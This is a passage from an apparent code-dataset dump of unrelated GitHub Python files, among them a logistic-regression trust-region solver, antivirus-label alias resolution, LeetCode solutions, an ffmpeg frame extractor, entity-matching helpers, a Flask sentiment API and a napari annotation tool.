np.logical_not(np.isclose(w_,0,atol=zero_atol))\n\t\tn_pos_free = np.sum(free_indices[:p])\n\t\t\n\t\tgradient_free = np.hstack((gradient[free_indices[:p]],2-gradient[free_indices[p:]]))\n\t\tX_T_pos,X_T_neg = X_T[free_indices[:p]],X_T[free_indices[p:]]\n\t\tX_pos,X_neg = ( csr_matrix(X_T_pos.T),csr_matrix(X_T_neg.T) ) if sparse else (X_T_pos.T,X_T_neg.T)\n\t\thess_dot_d = np.hstack((hess_dot_d[free_indices[:p]],-hess_dot_d[free_indices[p:]]))\n\t\tgradient_qd_free = hess_dot_d + gradient_free\n\t\tfor t in range(2*p):\n\t\t\tif not np.any(free_indices):\n\t\t\t\td = w_ - w\n\t\t\t\tbreak\n\t\t\t\n\t\t\tv,early_stop = CG(X_T_pos,X_T_neg,X_pos,X_neg,D,gradient_free,gradient_qd_free,hess_dot_d,d[free_indices],n_pos_free,region_size,conv_tol)\n\t\t\tlambda_ = 1\n\t\t\t#线性搜索,见论文式(55)\n\t\t\twhile True:\n\t\t\t\td_ = d.copy()\n\t\t\t\tw_free = np.clip(w_[free_indices] + lambda_*v,0,None)\n\t\t\t\td_[free_indices] = w_free - w[free_indices]\n\t\t\t\t\n\t\t\t\tgradient_dot_d_ = np.dot(gradient,d_[:p]) + np.dot(2-gradient,d_[p:])\n\t\t\t\thess_dot_d_ = X_T.dot(D*X.dot(d_[:p])) - 
X_T.dot(D*X.dot(d_[p:]))\n\t\t\t\tqd_ = 0.5* ( np.dot(d_[:p],hess_dot_d_) - np.dot(d_[p:],hess_dot_d_) ) + gradient_dot_d_ \n\t\t\t\t\n\t\t\t\tcondition = np.dot(gradient_qd_free,d_[free_indices] - d[free_indices])\n\t\t\t\tif less_equal(qd_-qd,sigma*condition):\n\t\t\t\t\tw_[free_indices],d,qd = w_free,d_,qd_\n\t\t\t\t\tfree_indices = np.logical_not(np.isclose(w_,0,atol=zero_atol))\n\t\t\t\t\tn_pos_free = np.sum(free_indices[:p])\n\t\t\t\t\tgradient_free = np.hstack((gradient[free_indices[:p]],2-gradient[free_indices[p:]]))\n\t\t\t\t\tX_T_pos,X_T_neg = X_T[free_indices[:p]],X_T[free_indices[p:]]\n\t\t\t\t\tX_pos,X_neg = ( csr_matrix(X_T_pos.T),csr_matrix(X_T_neg.T) ) if sparse else (X_T_pos.T,X_T_neg.T)\n\t\t\t\t\thess_dot_d = np.empty(np.sum(free_indices),np.float64)\n\t\t\t\t\thessian_dot(X_T_pos,X_T_neg,X,X,D,d,n_pos_free,hess_dot_d,p)\n\t\t\t\t\tgradient_qd_free = hess_dot_d + gradient_free\n\t\t\t\t\tbreak\n\n\t\t\t\tlambda_ *= beta\n\t\t\t\n\t\t\tif less_equal(norm(gradient_qd_free),conv_tol*norm(gradient_free)) or early_stop:\n\t\t\t\td = w_ - w\n\t\t\t\tbreak\n\t\t\n\t\tnew_w = w + d\n\n\t\texp_neg_Xy_dot_w = np.exp(-y*X.dot(new_w[:p]-new_w[p:]))\n\t\tnew_loss = np.sum(C*np.log(exp_neg_Xy_dot_w+1)) + np.sum(new_w)\n\t\t#计算reduction ratio,见论文式(45)\n\t\trho = (new_loss - loss)/qd\n\t\t#更新权向量,见论文式(46)\n\t\tif rho>eta0:\n\t\t\tw,loss = new_w,new_loss\n\t\t\tD = np.reciprocal(exp_neg_Xy_dot_w+np.reciprocal(exp_neg_Xy_dot_w)+2.)*C\n\t\t\tprobs_minus_one = (np.reciprocal(1+exp_neg_Xy_dot_w)-1)*C\n\t\t\tgradient = X_T.dot(probs_minus_one*y) + 1\n\t\t\n\t\t#更新region size\n\t\tif region_size= 2:\n return\n elif len(canonical_toks) == 1:\n canonical_tok = canonical_toks[0]\n\n # Update canonical token info\n self.av_stats.token_md5s[canonical_tok] = all_scan_idxs\n self.av_stats.related_tokens[canonical_tok] = all_related_tokens\n self.token_aliases[canonical_tok] = all_aliases\n\n # Make all other aliases reference canonical token\n for tok in self.token_aliases[tok1] | self.token_aliases[tok2]:\n if tok == canonical_tok:\n continue\n self.av_stats.token_md5s[tok] = self.av_stats.token_md5s[canonical_tok]\n self.av_stats.related_tokens[tok] = self.av_stats.related_tokens[canonical_tok]\n self.token_aliases[tok] = self.token_aliases[canonical_tok]\n\n return\n\n\n def edit_pct(self, tok1, tok2):\n \"\"\"Compute edit distance percentage between tokens.\n\n Many aliases have very similar spellings. 
Examples include adding\n digits/characters, using slight spelling changes, reversing the name of\n the token, or abbreviating parts of the token.\n \"\"\"\n\n # Compute edit distance between tok1 and tok2\n # Divide by length of longest token name to get edit perecent\n # Edit percent has range [0.0, 1.0]\n # 0.0 -> tok1 and tok2 are identical, 1.0 -> tok1 and tok2 are distant\n tok_short, tok_long = sorted([tok1, tok2], key=lambda l:len(l))\n min_len, max_len = len(tok_short), len(tok_long)\n edit_pct = editdistance.eval(tok1, tok2) / max_len\n\n # Many aliases are the names of tokens backwards, or are anagrams.\n # Override edit pct for anagrams.\n if min_len >= 6 and edit_pct > 0.25 and sorted(tok1) == sorted(tok2):\n edit_pct = 0.25\n\n # Override edit pct for tokens that are subsets of other tokens\n lcs_len = pylcs.lcs_sequence_length(tok_long, tok_short)\n if min_len >= 4 and lcs_len == min_len and edit_pct > 0.25:\n edit_pct = 0.25\n\n return edit_pct\n\n\n def co_occur_pct(self, tok1, tok2):\n \"\"\"Returns the co-occurrence percentage for two tokens.\"\"\"\n\n # Get scan reports that both tokens occur in\n tok1_scans = self.av_stats.token_md5s[tok1]\n tok2_scans = self.av_stats.token_md5s[tok2]\n intersect = len(tok1_scans.intersection(tok2_scans))\n min_occur, _ = sorted([len(tok1_scans), len(tok2_scans)])\n co_occur_pct = intersect / min_occur\n return co_occur_pct\n\n\n def get_total_count(self, tok):\n \"\"\"Returns the total number of scan reports that the token and any of\n its known aliases appears in.\"\"\"\n return len(self.av_stats.token_md5s[tok])\n\n\n def get_sorted_aliases(self, fmt):\n \"\"\"Returns a list of tuples, where each tuple contains a known cluster\n of trivial/sibling aliases. Each cluster is sorted by largest ->\n smallest token, and the clusters are sorted from largest -> smallest\n alias cluster.\n\n Arguments:\n fmt -- The token vocab\n \"\"\"\n\n # Get all known tokens for fmt\n known_tokens = set(self.av_stats.fmt_tokens[fmt].values())\n\n # Get set of all known trivial/sibling alias clusters\n aliases = set()\n for tok in known_tokens:\n tok_aliases = list(sorted(self.token_aliases[tok]))\n tok_aliases.sort(key=lambda tok: self.av_stats.token_counts[tok],\n reverse=True)\n aliases.add(tuple(tok_aliases))\n\n # Sort by size of alias cluster\n aliases = list(aliases)\n aliases.sort(key=lambda a: self.get_total_count(a[0]), reverse=True)\n return aliases\n\n\n def resolve_trivial_aliases(self, fmt):\n \"\"\"Resolve trivial aliases - token ending with an extra digit.\n\n Arguments:\n fmt -- The token vocab\n \"\"\"\n\n # Get list of all known tokens in vocab\n known_tokens = self.av_stats.fmt_tokens[fmt]\n expanded_tokens = known_tokens.copy()\n if fmt in [CAT, TGT]:\n expanded_tokens.update(self.av_stats.fmt_tokens[PRE])\n\n # Identify tokens that are variants of known tokens which have\n # predictable substring suffixes/prefixes\n to_resolve = []\n for tok in expanded_tokens:\n if len(tok) <= 6:\n continue\n\n # Identical except for an extra digit\n if tok[-1].isnumeric() and tok[:-1] in known_tokens:\n to_resolve.append((tok, tok[:-1]))\n continue\n\n # Identical except for an extra character\n if len(tok) >= 10 and tok[:-1] in known_tokens:\n to_resolve.append((tok, tok[:-1]))\n continue\n\n # Identical except for a prefix\n found_pre = False\n for pre in self.token_substrings[\"PRE_SUBSTR\"]:\n if len(tok) > len(pre) and tok.endswith(pre):\n if tok[len(pre):] in known_tokens:\n to_resolve.append((tok, tok[len(pre):]))\n found_pre = True\n 
break\n if found_pre:\n continue\n\n # Identical except for a suffix\n for suf in self.token_substrings[\"SUF_SUBSTR\"]:\n if len(tok) > len(suf) and tok.endswith(suf):\n if tok[:len(suf)*-1] in known_tokens:\n to_resolve.append((tok, tok[:len(suf)*-1]))\n break\n\n # Resolve trivial aliases\n num_resolved = 0\n for tok1, tok2 in to_resolve:\n self.resolve_alias_pair(tok1, tok2)\n num_resolved += 1\n\n return\n\n\n def resolve_child_aliases(self, fmt, E=0.4, C=0.5):\n \"\"\"Resolves 'parent/child' aliases.\n\n Due to differences in granualirity, one token have a one-way\n relationship with another token. By this, we mean that one token (which\n we call a child token) is smaller than a second (a parent token), and\n the parent token almost always co-occurs in scan reports containing\n the child token. However, since the parent token is more widespread,\n there are scan reports where it occurs but the child token does not.\n\n We identify parent/child aliases as pairs of tokens with high weak\n co-occurrence percentage and low token edit percent.\n\n Arguments:\n fmt -- The token vocab\n E -- Threshold for edit percent\n C -- Threshold for combined weak co-occurrence percentage and edit\n percentage, (1 - edit_pct) * weak_co_occur_pct\n \"\"\"\n\n # Sort tokens by count (largest -> smallest)\n # Give priority to known canonical tokens\n known_canonical = self.known_canonical_tokens[fmt]\n unknown_tokens = [tok for tok in self.av_stats.fmt_tokens[fmt]\n if tok not in known_canonical]\n known_canonical = list(known_canonical)\n known_canonical.sort(key=lambda f: self.av_stats.token_counts[f],\n reverse=True)\n unknown_tokens.sort(key=lambda f: self.av_stats.token_counts[f],\n reverse=True)\n sorted_tokens = known_canonical + unknown_tokens\n remaining_tokens = set(sorted_tokens)\n if fmt in [CAT, TGT]:\n remaining_tokens.update(self.av_stats.fmt_tokens[PRE])\n\n # Iterate over tokens\n for tok1 in sorted_tokens:\n remaining_tokens.remove(tok1)\n\n # Iterate over every token known to co-occur with tok1\n for tok2 in self.av_stats.related_tokens[tok1]:\n if tok2 not in remaining_tokens:\n continue\n\n # Compute edit percentage between tok1 and tok2\n edit_pct = self.edit_pct(tok1, tok2)\n if edit_pct >= E:\n continue\n\n # Use a combination of edit pct and co-occurrence percent for\n # identifying parent/child aliases\n co_occur_pct = self.co_occur_pct(tok1, tok2)\n if (1 - edit_pct) * co_occur_pct >= C:\n self.child_aliases[tok1].add(tok2)\n self.parent_aliases[tok2].add(tok1)\n\n return\n\n\n def get_fmt_alias_mapping(self, fmt, E=0.6):\n \"\"\"Returns dict where the key is the canonical (most common) name of a\n token, and the value is a list of its aliases.\n\n Argument:\n fmt -- Current token vocabulary (e.g. 
CAT, TGT, etc.)\n E -- Threshold based on edit score and co-occurrence percentage\n \"\"\"\n\n # Sort tokens by count (largest -> smallest)\n # Give priority to known canonical tokens\n known_canonical = self.known_canonical_tokens[fmt]\n unknown_tokens = [tok for tok in self.av_stats.fmt_tokens[fmt]\n if tok not in known_canonical]\n known_canonical = list(known_canonical)\n known_canonical.sort(key=lambda f: self.av_stats.token_counts[f],\n reverse=True)\n unknown_tokens.sort(key=lambda f: self.av_stats.token_counts[f],\n reverse=True)\n sorted_tokens = known_canonical + unknown_tokens\n remaining_tokens = set(sorted_tokens)\n\n # Iterate over all tokens\n fmt_alias_mapping = {}\n for tok1 in sorted_tokens:\n if tok1 not in remaining_tokens:\n continue\n remaining_tokens.remove(tok1)\n\n # Form queue from current token's aliases and child aliases\n alias_queue = self.token_aliases[tok1]\n alias_queue = alias_queue.union(self.child_aliases[tok1])\n alias_queue = list(alias_queue)\n\n # Recursively get all children of the canonical token\n # For CAT and TGT tokens, stop recursing if the alias would have\n # too large of an edit distance from the canonical token\n aliases = set()\n while len(alias_queue):\n tok2 = alias_queue.pop(0)\n if tok2 not in remaining_tokens or tok2 in aliases:\n continue\n\n # Don't expand tok2 if it (or its aliases) have a different\n # canonical token\n has_different_canonical = False\n for tok in self.token_aliases[tok2]:\n if (self.fmt_alias_mapping[fmt].get(tok) is not None and\n self.fmt_alias_mapping[fmt][tok] != tok1):\n has_different_canonical = True\n if has_different_canonical:\n continue\n\n # Expand queue with aliases of tok2\n alias_queue += list(self.token_aliases[tok2])\n alias_queue += list(self.child_aliases[tok2])\n aliases.add(tok2)\n\n # Add canonical token and aliases to mapping\n if not len(aliases):\n continue\n for tok2 in aliases:\n remaining_tokens.remove(tok2)\n aliases = [tok for tok in aliases\n if self.fmt_alias_mapping[fmt].get(tok) is None]\n fmt_alias_mapping[tok1] = sorted(aliases)\n\n return fmt_alias_mapping\n\n\n def write_alias_mapping(self, alias_file):\n \"\"\"Write the generated alias mapping to alias_file.\"\"\"\n\n write_fmts = [CAT, TGT, PACK]\n with open(alias_file, \"w\") as f:\n for fmt in write_fmts:\n f.write(\"[{}]\\n\".format(fmt))\n sorted_fmt_aliases = list(self.fmt_alias_mapping[fmt].items())\n sorted_fmt_aliases.sort(key=lambda l:l[1])\n for alias, canonical_token in sorted_fmt_aliases:\n f.write(\"{}\\t{}\\n\".format(alias, canonical_token))\n f.write(\"\\n\")\n return\n","repo_name":"NeuromorphicComputationResearchProgram/ClarAVy","sub_path":"claravy/avalias.py","file_name":"avalias.py","file_ext":"py","file_size_in_byte":17564,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"84"} +{"seq_id":"36914156752","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\n给定一棵 N 叉树的根节点 root ,返回该树的深拷贝(克隆)。\n\nN 叉树的每个节点都包含一个值( int )和子节点的列表( List[Node] )。\n\nclass Node {\n public int val;\n public List children;\n}\nN 叉树的输入序列用层序遍历表示,每组子节点用 null 分隔(见示例)。\n\n进阶:你的答案可以适用于克隆图问题吗?\n\n \n\n示例 1:\n\n\n\n输入:root = [1,null,3,2,4,null,5,6]\n输出:[1,null,3,2,4,null,5,6]\n示例 2:\n\n\n\n输入:root = [1,null,2,3,4,5,null,null,6,7,null,8,null,9,10,null,null,11,null,12,null,13,null,null,14]\n输出:[1,null,2,3,4,5,null,null,6,7,null,8,null,9,10,null,null,11,null,12,null,13,null,null,14]\n \n\n提示:\n\n给定的 N 叉树的深度小于或等于 1000。\n节点的总个数在 [0, 10^4] 
之间\n\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/clone-n-ary-tree\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n\n\"\"\"\n\n\n# Definition for a Node.\nclass Node:\n def __init__(self, val=None, children=None):\n self.val = val\n self.children = children if children is not None else []\n\n\nclass Solution:\n def cloneTree(self, root: 'Node') -> 'Node':\n if not root:\n return None\n result = Node(root.val)\n for i in root.children:\n # 这里使用的是递归方式,获取下一个节点\n result.children.append(self.cloneTree(i))\n\n return result\n","repo_name":"Carmenliukang/leetcode","sub_path":"算法分析和归类/树/克隆 N 叉树.py","file_name":"克隆 N 叉树.py","file_ext":"py","file_size_in_byte":1575,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"} +{"seq_id":"37911189112","text":"\ndef isValid(s: str) -> bool:\n #1. list를 사용하고 일일이 비교하는 코드\n # stack = list()\n\n # for i in range(len(s)):\n # if s[i] == '(' or s[i] == '[' or s[i] == '{':\n # stack.append(s[i])\n # else:\n # if len(stack) == 0:\n # return False\n # last = stack.pop()\n # if (last == '(' and s[i] != ')') or \\\n # (last == '[' and s[i] != ']') or \\\n # (last == '{' and s[i] != '}'):\n # return False\n # if len(stack) != 0:\n # return False\n # return True\n #2. dict mapping으로 비교를 간소화\n stack = []\n table = {\n ')': '(',\n '}': '{',\n ']': '['\n }\n\n #스택 이용 예외 처리 및 일치여부 판별\n for char in s:\n if char not in table:\n stack.append(char)\n elif not stack or table[char] != stack.pop():\n return False\n return len(stack) == 0","repo_name":"jungmyeong96/daily_algorithms","sub_path":"Leetcode/StackNQueue/20_valid_parentheses.py","file_name":"20_valid_parentheses.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"18321549251","text":"\"\"\"\n THIS CODE REQUIRES FFMPEG BINARY INSTALLED\n\"\"\"\n\nimport yaml\nimport os\nimport json\nimport argparse\n\ndef __make_frames(config_path: str) -> None:\n with open(config_path) as config_file:\n config = yaml.safe_load(config_file)\n \n videos_path = config['split_2m']['vids_2m_path']\n labels_path = config['make_frames']['labels_path']\n frames_path = config['make_frames']['frames_path']\n cmd = 'ffmpeg -i {0} -vf select=\"eq(n\\,{1})\" \\\n-vsync vfr -q:v 2 -vcodec png {2}'\n\n for label in list(filter(lambda x: x.endswith('.json'), \\\n os.listdir(labels_path))):\n indicies = __get_indicies(os.path.join(labels_path, label))\n for n, idx in enumerate(indicies):\n out_file = os.path.join(frames_path, \\\n label.split('.')[0]+'_'+str(n)+'.png')\n os.system(cmd.format(os.path.join(videos_path, \\\n __get_video_name(label)), idx, out_file))\n\ndef __get_indicies(label_path: str) -> list:\n with open(label_path) as labels_file:\n labels = json.load(labels_file)\n \n indicies = []\n for idx in labels['frames']:\n idx = idx['index']\n indicies.append(idx)\n return indicies\n\ndef __get_video_name(label: str) -> str:\n return label.split('.')[0] + '.mp4'\n\nif __name__ == '__main__':\n args_parser = argparse.ArgumentParser()\n args_parser.add_argument('--config', dest='config', required=True)\n args = args_parser.parse_args() \n\n __make_frames(args.config)","repo_name":"wonderooo/veles","sub_path":"src/data/make_frames.py","file_name":"make_frames.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"1376432094","text":"#Hit the number\nimport 
random\nnumber=random.randint(0,100)\nfinish=False\n\nwhile(finish==False):\n usernumber=input(\"What number i'm thinking now?? \")\n usernumber=int(usernumber)\n\n if usernumber==number:\n print(\"Yes!! Congratulations my friend!\")\n finish=True\n elif usernumber 1:\n first = self.stack.pop()\n second = self.stack.pop()\n self.stack.append(first + second)\n else:\n raise LackOfElementsException\n\n def minus(self):\n \"\"\"\n 요소가 1개면 오류 리턴\n \"\"\"\n if len(self.stack) > 1:\n first = self.stack.pop()\n second = self.stack.pop()\n self.stack.append(first - second)\n else:\n raise LackOfElementsException\n\n def push(self, num: int):\n self.stack.append(num)\n\n def pop(self):\n \"\"\"\n 요소가 없으면 오류 리턴\n \"\"\"\n if self.stack:\n return self.stack.pop()\n raise NoElementException\n\n def duplicate(self):\n \"\"\"\n 요소가 없으면 오류 리턴\n \"\"\"\n if self.stack:\n return self.stack.append(self.stack[-1])\n raise NoElementException\n\n def result(self):\n try:\n for s in self.string:\n if s == '+':\n self.plus()\n elif s == '-':\n self.minus()\n elif s == 'POP':\n self.pop()\n elif s == 'DUP':\n self.duplicate()\n else:\n self.push(int(s))\n return self.stack.pop()\n except (NoElementException, LackOfElementsException):\n return -1\n\n\ndef solution(S):\n my_stack = MyStack(S)\n return my_stack.result()\n\n\nprint(solution(\"4 5 6 - 7 +\"))\nprint(solution(\"13 DUP 4 POP 5 DUP + DUP + -\"))\nprint(solution(\"5 6 + -\"))\nprint(solution(\"3 DUP 5 - -\"))\n\n\n\n","repo_name":"Dokeey/CodingTest","sub_path":"codility/Q2.py","file_name":"Q2.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"43252243197","text":"import os\nimport sys\nimport torch\nimport random\nimport numpy as np\n\n\nfrom pretrain import PretrainModel\nfrom dataset import PretrainDataset\nfrom torch.utils import data\n\ndef set_seed(seed: int):\n \"\"\"\n Helper function for reproducible behavior to set the seed in ``random``, ``numpy``, ``torch``\n \"\"\"\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n\ndef sequentialize_ditto(instance, tableA, tableB):\n '''\n Args:\n instance(string): The test instance in the format of left id, right id, label\n tableA/tableB(dataframe): The dataframe of records in the left/right table\n Returns:\n line(str): The sequentialized result in the format of Ditto\n '''\n left = \"\"\n right = \"\"\n idxA = instance[0]\n idxB = instance[1]\n label = str(instance[2])\n header = list(tableA)\n for i,attr in enumerate(header):\n left += \" COL \"+str(attr)+\" VAL \"+str(tableA.iloc[idxA, i])\n right += \" COL \"+str(attr)+\" VAL \"+str(tableB.iloc[idxB, i])\n line = left.strip()+\"\\t\"+right.strip()+\"\\t\"+label\n return line\n\n \ndef load_teacher_ditto(lm, model_path, config, gpu=True, fp16=False):\n if not os.path.exists(model_path):\n raise ModelNotFoundError(model_path)\n if gpu:\n device = 'cuda' if torch.cuda.is_available() else 'cpu'\n else:\n device = 'cpu'\n model = PretrainModel(device=device, lm=lm)\n saved_state = torch.load(model_path, map_location=lambda storage, loc: storage)\n model.load_state_dict(saved_state)\n model = model.to(device)\n if fp16 and 'cuda' in device:\n from apex import amp\n model = amp.initialize(model, opt_level='O2')\n return model\n \n \ndef student_ground_truth_ditto(model, records, args):\n '''\n model (MultiTaskNet): The trained Ditto model\n records (Array): The test sets, each item is in the Ditto 
format\n args(defaultdict): the arguments necessaqry to eval the model\n '''\n dataset = PretrainDataset(records, args['vocab'], args['name'], lm=args['lm'], max_len=args['max_len'])\n iterator = data.DataLoader(dataset=dataset,\n batch_size=args['batch_size'],\n shuffle=False,\n num_workers=0,\n collate_fn=PretrainDataset.pad)\n Y_hat = []\n with torch.no_grad():\n for i, batch in enumerate(iterator):\n words, x, is_heads, tags, mask, y, seqlens, taskname = batch\n taskname = taskname[0]\n _, _, y_hat = model(x, y, task=taskname) # y_hat: (N, T)\n Y_hat.extend(y_hat.cpu().numpy().tolist())\n\n results = []\n for i in range(len(records)):\n pred = dataset.idx2tag[Y_hat[i]]\n results.append(str(pred))\n return results\n\n\ndef predict_ditto(inputs, config, model, batch_size=64):\n set_seed(20220104)\n dataset = PretrainDataset(inputs, config['vocab'], config['name'], lm=config['lm'], max_len=config['max_len'])\n iterator = data.DataLoader(dataset=dataset,\n batch_size=batch_size,\n shuffle=False,\n num_workers=0,\n collate_fn=PretrainDataset.pad)\n Y_logits = []\n Y_hat = []\n with torch.no_grad():\n for i, batch in enumerate(iterator):\n words, x, is_heads, tags, mask, y, seqlens, taskname = batch\n taskname = taskname[0]\n logits, _, y_hat = model(x, y, task=taskname) # y_hat: (N, T)\n Y_logits += logits.softmax(-1).cpu().numpy().tolist()\n Y_hat.extend(y_hat.cpu().numpy().tolist())\n\n results = []\n for i in range(len(inputs)):\n pred = dataset.idx2tag[Y_hat[i]]\n results.append(pred)\n\n return results, Y_logits","repo_name":"megagonlabs/minun","sub_path":"ditto_helper.py","file_name":"ditto_helper.py","file_ext":"py","file_size_in_byte":3858,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"83"} +{"seq_id":"34976627750","text":"import redis\nfrom langchain.callbacks.manager import CallbackManager\nfrom langchain.llms import LlamaCpp\nfrom langchain.callbacks.streaming_aiter import AsyncIteratorCallbackHandler\nfrom langchain.callbacks.manager import CallbackManager\nfrom langchain.callbacks.base import BaseCallbackHandler\nimport os\nimport json\nfrom dotenv import load_dotenv\nload_dotenv()\n\n\n\nclass MyCustomHandler(BaseCallbackHandler):\n # Create a connection to Redis\n def __init__(self):\n redisURL = os.getenv(\"redisURL\")\n self.r = redis.Redis(host=redisURL, port=6379, decode_responses=True)\n\n def on_llm_new_token(self, token: str, **kwargs) -> None:\n # Set a value\n if(len(kwargs.get(\"tags\")) == 0):\n return\n ret = {\"id\":kwargs.get(\"tags\")[0],\"chatNum\":kwargs.get(\"tags\")[1], \"token\":token}\n self.r.append(kwargs.get(\"tags\")[0], json.dumps(ret) )\n self.r.expire(kwargs.get(\"tags\")[0],12000)\n \n# Callbacks support token-wise streaming\n\n\n\nclass common(object):\n callback_manager = CallbackManager([MyCustomHandler()])\n\n def __init__(self):\n redisURL = os.getenv(\"redisURL\")\n self.chatredis = redis.Redis(host=redisURL, db=0, port=6379, decode_responses=True)\n self.imageredis = redis.Redis(host=redisURL, db=2, port=6379, decode_responses=True)\n path = os.getenv(\"model\")\n print(path)\n #n_gpu_layer = 1\n\n# n_batch = 128\n #print(os.getenv(\"model\"))\n self.llm = LlamaCpp(\n model_path=path,\n temperature=0.75,\n #max_tokens=2000,\n #top_p=1,\n callbacks=[MyCustomHandler()],\n #verbose=True,\n # n_gpu_layers=n_gpu_layer,\n # n_batch=n_batch,\n #n_ctx=2048,\n #f16_kv=True,\n 
)\n","repo_name":"Microshak/LLM_Chat_UI","sub_path":"chat/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"72212999311","text":"import re\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize\nfrom nltk.stem import WordNetLemmatizer\nimport string\nimport nltk\nfrom sklearn.feature_extraction.text import CountVectorizer\nimport pandas as pd\nimport joblib\nimport nltk\nnltk.download('stopwords')\nnltk.download('punkt')\n#---------------------------importing data and training the ocuntvectorizer----------------------------------------------\ndf=pd.read_csv('preprocessed_twitter_data.csv')\n\ndf = df.dropna(subset=['clean_tweet'])\ndf = df.reset_index(drop=True)\n\nbow_vectorizer = CountVectorizer(max_df=0.90,min_df=2,max_features=5000, stop_words='english')\n\nbow_vectorizer.fit(df['clean_tweet'])\n#----------------------------------Defining preprocessing functions-------------------------------------------\nnltk.download('wordnet')\n\nlemma = WordNetLemmatizer()\nstopwords = set(stopwords.words('english'))\n\ndef cleaning_URLs(data):\n txt = re.sub(r\"(https?://|www\\.)\\S+\", ' ', data)\n return re.sub(r\"(www\\.|https?://)\", ' ', txt)\n\ndef remove_punctuation(txt):\n txt_nopunct = \"\".join([c for c in txt if c not in string.punctuation])\n return txt_nopunct\n\ndef cleaning_numbers(txt):\n return re.sub('[0-9]+', '', txt)\n\ndef remove_stopwords(txt):\n txt_clean = \" \".join([word for word in txt.split() if word not in stopwords])\n return txt_clean\n\ndef remove_repeating_characters(text):\n cleaned_text = re.sub(r'(\\w)\\1+', r'\\1', text)\n return cleaned_text\n\ndef tokenize(txt):\n tokens = word_tokenize(txt)\n return tokens\n\ndef lemmatization(token_txt):\n text = [lemma.lemmatize(word) for word in token_txt]\n return text\n\nmodel=joblib.load('BOW_model.joblib')\n#-----------------------------------------------------Flask App---------------------------------------------------------------------------------------\n\n\nfrom flask import Flask, render_template, request, jsonify\n\napp = Flask(__name__)\n\n@app.route('/predict', methods=['POST'])\ndef process_text():\n data = request.json\n input = data.get('text')\n\n input=input.lower()\n #Removing URLs\n input=cleaning_URLs(input)\n #Removing punctuations\n input=remove_punctuation(input)\n #Removing numbers\n input=cleaning_numbers(input)\n #removing stopwords\n input=remove_stopwords(input)\n #Removing repeating characters\n input=remove_repeating_characters(input)\n #Tokenizing\n input=tokenize(input)\n #lemmantizing\n input=lemmatization(input)\n #joining tokens\n input=\" \".join(input)\n\n bow_input = bow_vectorizer.transform([input])\n bow_pred = model.predict(bow_input)\n\n if bow_pred[0]==0:\n sentiment='Negative'\n else:\n sentiment='Positive'\n \n return jsonify({'processed_text':sentiment})\n\nif __name__ == '__main__':\n app.run(debug=True)\n\n","repo_name":"ParthSingh0306/Twitter-Sentimental-Analysis","sub_path":"api/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"26200954589","text":"\"\"\"\nAnnotate segmentation with text\n===============================\n\nPerform a segmentation and annotate the results with\nbounding boxes and text\n\n.. 
tags:: analysis\n\"\"\"\nimport numpy as np\nimport skimage\nfrom skimage import data\nfrom skimage.filters import threshold_otsu\nfrom skimage.segmentation import clear_border\nfrom skimage.measure import label, regionprops_table\nfrom skimage.morphology import closing, square, remove_small_objects\nimport napari\nfrom magicgui import magicgui\nfrom magicgui.widgets import FunctionGui\nfrom napari import Viewer\nfrom napari.types import ImageData, LabelsData, LayerDataTuple\n \n \n@magicgui(call_button='Save Annotation')\ndef save_annotation(viewer: Viewer) -> None:\n global label_path\n global label_name\n image = viewer.layers[label_name]\n skimage.io.imsave(label_path,image.data)\n print(\"Saved Image\")\n \n \nfrom PIL import Image\nimport matplotlib.pyplot as plt\n\n \nmicro_image = skimage.io.imread(\"loading_screen.jpg\")\nlabel_image = skimage.io.imread(\"loading_screen_overlay.png\")\n\ndef RGB_to_scaled_RGBA(RGB_tuple):\n return (RGB_tuple[0]/255,RGB_tuple[1]/255,RGB_tuple[2]/255,1.0)\n\n\ncolor_dict = {\n \"1M-Qt\":RGB_to_scaled_RGBA((130, 180, 187)),\n \"2M-Qt\":RGB_to_scaled_RGBA((38, 119, 120)),\n \"3M-Qt\":RGB_to_scaled_RGBA((37, 94, 121)),\n \"1M-Mx\":RGB_to_scaled_RGBA((174, 60, 96)),\n \"2M-Mx\":RGB_to_scaled_RGBA((223, 71, 60)),\n \"1M-Tm\":RGB_to_scaled_RGBA((243, 195, 60))}\n\ncolor_dict_with_one_based_index = dict(zip([1,2,3,4,5,6],color_dict.values()))\n\nviewer = napari.view_image(micro_image, name='micro_image', rgb=False)\nlabel_layer = viewer.add_labels(label_image, name='segmentation',color=color_dict_with_one_based_index)\n\n\n#empty_widget = EmptyGui()\n#viewer.window.add_dock_widget(empty_widget, area='right')\n\n##############\n#qt Widget\nimport sys\nfrom PyQt5.QtWidgets import QApplication, QLabel\nfrom PyQt5.QtGui import QPixmap\n\nclass ImageWidget(QLabel):\n def __init__(self, parent=None):\n super().__init__(parent)\n\n def set_image(self, file_path):\n pixmap = QPixmap(file_path)\n self.setPixmap(pixmap)\n\nimage_widget = ImageWidget()\nimage_widget.set_image('colormap_white.png')\n\n\n###################\n\n\n\n###\n#file viewer widget \n\nimport os\n\nimport pathlib\nfrom pathlib import Path\n\n\n\nbase_path = None\n\n@magicgui(fn={'mode': 'd'}, call_button='Scan Directory')\n#def path_widget(fn = pathlib.Path.home()):\ndef path_widget(fn = Path(os.getcwd())):\n print(fn)\n global base_path\n base_path = fn\n list_images(base_path)\n \n#########\n\nimport os\nimport 